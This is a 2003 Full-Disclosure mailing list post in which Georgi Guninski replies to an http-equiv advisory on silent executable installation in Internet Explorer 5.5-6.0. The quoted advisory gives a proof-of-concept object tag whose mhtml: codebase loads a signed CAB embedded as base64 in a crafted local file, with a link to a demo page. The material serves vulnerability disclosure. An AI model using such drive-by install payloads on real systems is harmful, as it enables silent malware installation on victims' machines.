Re: SILLY BEHAVIOR Part III : Internet Explorer 5.5 - 6.0

[Georgi Guninski <guninski () guninski com>]

Has the users at microsoft fixed reinstalling of bugware signed by them?
outlctl.dll (amongst other stuff) used to be a disguised frontend to cmd.exe and 
was quite signed.
IIRC at a time microsoft even wrote in a security bulletin: "remove us from the 
trusted publishers in exploder" - has this changed, i.e. are they *now* claiming
they are a trusthworthy publisher again?

Georgi

http-equiv () excite com wrote:
> Sunday, May 4, 2003
>
>
> Silent delivery and installation of an executable on the target 
> machine, default install of win98 and Internet Explorer with all 
> patches to date. No client input other than viewing a web page:
>
> Mildly amused by the recent patching of the codebase saga spanning 
> nearly 3 years now, we put on our thinking caps and come to the very 
> simple, yet delicious conclusion:
>
> As below we are able to inject arbitrary html into the local computer 
> zone thus bypassing the browser's security. Nevertheless the codebase 
> exploits as detailed time and time again, now no longer function, 
> returning the standard active x error or security warning.
>
> BUT !
>
> there is a very specific reason for that and to bypass it, we do like 
> so:
>
> ----local.html----
>
> <object CLASSID="CLSID:55555555-5555" 
> codebase="mhtml:file:///C:\WINDOWS\Temp\wecerr.txt!
> File://malware.cab">
>
> ----local.html----
>
> and where our:
>
> ---wecerr.txt---
> MIME-Version: 1.0
> Content-Location:File://malware.cab
> Content-Transfer-Encoding: base64
>
> TVNDRgAAAAAyQAYAAAAAAEQAAAAAAAAAAwEBAAIABADJBwAAFAAAAAAAEAAyQAYAgBUAAA
> AAAAAA
>
> ---wecerr.txt---
>
> contains a "signed" cab file.  The digital signature is our key.
>
> Provided the executable is signed, we are again able to install via 
> the codebase object, from the local machine and without any prompts 
> or warnings. Certainly we would not expect malware to be digitally 
> signed out in the wild, but for what it is worth, we are back in 
> business.
>
> Working Example
>
> http://www.malware.com/aha.html
>
> Caution:
>
> a) for demonstration purposes we use the ubiquitous flash file [.cab 
> file] as it is both signed and benign and you are able to visually 
> see the install:
>
> [screen shot: http://www.malware.com/aha.png 14KB]
>
> b) the custom crafted wecerr.txt weighs in at a hefty 555 KB, and can 
> take a short while to download:
>
> [screen shot: http://www.malware.com/ah.png 4KB]
>
> once downloaded, simply take the:
>
> ----local.html----
>
> <object CLASSID="CLSID:55555555-5555" 
> codebase="mhtml:file:///C:\WINDOWS\Temp\wecerr.txt!
> File://malware.cab">
>
> ----local.html----
>
> and away you go.
>
> Notes:
>
> 1. None
>
> End Call


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html